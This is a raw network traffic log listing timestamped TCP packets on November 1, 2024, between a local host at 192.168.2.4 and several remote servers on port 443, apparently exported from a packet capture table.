                                                                                        Nov 1, 2024 13:46:08.639185905 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.639241934 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.639246941 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.690646887 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.754245996 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.754323006 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.754360914 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.754389048 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.754391909 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.754417896 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.754441977 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.754492998 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:08.754573107 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.754861116 CET49756443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:08.754879951 CET44349756104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.056545019 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.056827068 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.056848049 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.057161093 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.057580948 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.057631969 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.057818890 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.103337049 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.114726067 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.115082979 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.115113020 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.115726948 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.116034031 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.116115093 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.116246939 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.163352013 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.207731962 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.207781076 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.207808018 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.207842112 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.207859993 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.207940102 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.207978964 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.208008051 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.208013058 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.208056927 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.208095074 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.208153009 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.208158016 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.208164930 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.208245039 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.212527990 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.252401114 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.252557039 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.252602100 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.252681017 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.253346920 CET49758443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.253375053 CET44349758104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.256581068 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.256652117 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.256844044 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.257015944 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.257049084 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331175089 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331249952 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331284046 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331331968 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331377029 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331399918 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.331413031 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331470013 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331521988 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.331527948 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331662893 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.331935883 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.331999063 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332067966 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332099915 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.332104921 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332746029 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.332753897 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332804918 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332835913 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332866907 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.332917929 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.332917929 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.332925081 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.374201059 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.374310017 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.374344110 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.374490023 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.374655962 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.374670982 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.421921015 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.454612017 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.454719067 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.454766035 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.454798937 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.454842091 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.454854965 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.454869986 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.454878092 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.454994917 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.455015898 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.455019951 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.455164909 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.455384016 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.455828905 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.455837965 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456003904 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456012964 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456032991 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.456039906 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456058979 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.456255913 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.456260920 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456567049 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456695080 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.456701040 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456722021 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456742048 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.456744909 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.456774950 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.457469940 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.457581997 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.457587957 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.457647085 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.457719088 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.457724094 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.457734108 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.458411932 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.458551884 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.458580017 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.458586931 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.458606958 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.497770071 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.497817039 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.497857094 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.497869015 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.497901917 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.550287008 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.577857971 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.577871084 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.577939987 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.577969074 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.577984095 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578023911 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.578025103 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.578061104 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578252077 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.578376055 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578531981 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578567982 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.578572035 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578599930 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.578660965 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578743935 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.578766108 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.579128027 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.580910921 CET49757443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.580935001 CET44349757104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.589462996 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.589551926 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.589699030 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.590553045 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.590589046 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.633625984 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:09.675362110 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.747594118 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.747657061 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.748080969 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.750402927 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.750413895 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.861929893 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.914460897 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.963407040 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.963459015 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.964067936 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.966377020 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.966487885 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.983396053 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:09.989350080 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.989480972 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:09.994705915 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:10.017407894 CET49751443192.168.2.4188.114.97.3
                                                                                        Nov 1, 2024 13:46:10.017476082 CET44349751188.114.97.3192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.027333975 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.032043934 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.032131910 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.032469034 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.033410072 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.033440113 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.116745949 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.116831064 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.117384911 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.122107029 CET49759443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.122123003 CET44349759104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.208012104 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.208468914 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.208492994 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.208796024 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.209217072 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.209270954 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.209357023 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.251346111 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.349921942 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.349987984 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350027084 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350035906 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.350079060 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350131035 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.350187063 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350454092 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350486994 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350500107 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.350505114 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.350543022 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.350549936 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.354540110 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.354593992 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.354600906 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.364566088 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.364795923 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.364814043 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.365176916 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.365593910 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.365689993 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.365819931 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.365853071 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.365907907 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.407102108 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.468862057 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469060898 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469122887 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.469151020 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469181061 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469228983 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.469285965 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469455957 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469502926 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.469521999 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469813108 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469858885 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.469863892 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.469965935 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.470038891 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.470042944 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.470541954 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.470593929 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.470598936 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.470765114 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.470808983 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.470813990 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.471290112 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.471343994 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.471349001 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.471493006 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.471539974 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.471546888 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.471661091 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.471709967 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.471714973 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.517558098 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.563986063 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564053059 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564086914 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564095020 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.564111948 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564152002 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.564158916 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564590931 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564627886 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564630032 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.564647913 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.564686060 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.564913988 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587332010 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587476015 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587522984 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.587544918 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587611914 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587646961 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.587651968 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587778091 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587816000 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.587820053 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.587949038 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.588001013 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.588005066 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.588454962 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.588505030 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.588510990 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.588547945 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.588587046 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.588592052 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.588627100 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.588632107 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.589495897 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.589548111 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.589556932 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.589585066 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.589611053 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.589615107 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.589632988 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.590190887 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.590235949 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.590243101 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.590280056 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.590357065 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.590396881 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.590409994 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.590451002 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.591206074 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.591257095 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.591435909 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.591491938 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.617964983 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.617984056 CET44349761104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.629467964 CET44349760104.18.95.41192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.629543066 CET49760443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.643836975 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.644083023 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.644150972 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.645231962 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.645303011 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.646421909 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.646506071 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.646672964 CET49762443192.168.2.435.190.80.1
                                                                                        Nov 1, 2024 13:46:10.646692038 CET4434976235.190.80.1192.168.2.4
                                                                                        Nov 1, 2024 13:46:10.664547920 CET49761443192.168.2.4104.18.95.41
                                                                                        Nov 1, 2024 13:46:10.683487892 CET44349761104.18.95.41192.168.2.4
